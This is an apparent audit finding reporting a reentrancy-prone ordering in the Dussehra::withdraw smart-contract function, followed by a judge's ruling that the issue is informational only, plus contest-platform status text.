`Dussehra::withdraw` function doesn't follow CEI pattern
Summary
The Dussehra::withdraw function should follow the CEI(Checks-Effects-Interactions) pattern, here it breaks the pattern by making a state change after the transfer to msg.sender is done which can allow the msg.sender to reenter the function.
Vulnerability Details
The Dussehra::withdraw function doesn't follow the CEI pattern,
It is violated by the line
which is making a state change after the transfer is done allowing a msg.sender to reenter the function and call Dussehra::withdraw again
Impact
The Reentrancy lies dormant in the Dussehra::withdraw function with no real impact for now since after the initial withdraw the contract is left with no balance but if there were any changes in the future then there will always be a possibility for the msg.sender to reenter the function to steal funds
Tools Used
Manual Review
Foundry
Recommendations
The Dussehra::withdraw function should follow the CEI pattern i.e make the state change before the transfer is done and use OpenZeppelins non-reentrant modifier to prevent reentrancy.
Lead Judging Commences
Invalid - reentrancy in withdraw
The `withdraw` function sends the given amount to Ram. If the attacker calls the `withdraw` function again before the state variable is changed, the function will revert because there are no more funds in the contract. This reentrancy has no impact for the protocol. It is recommended to follow the CEI pattern, but this is informational.
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.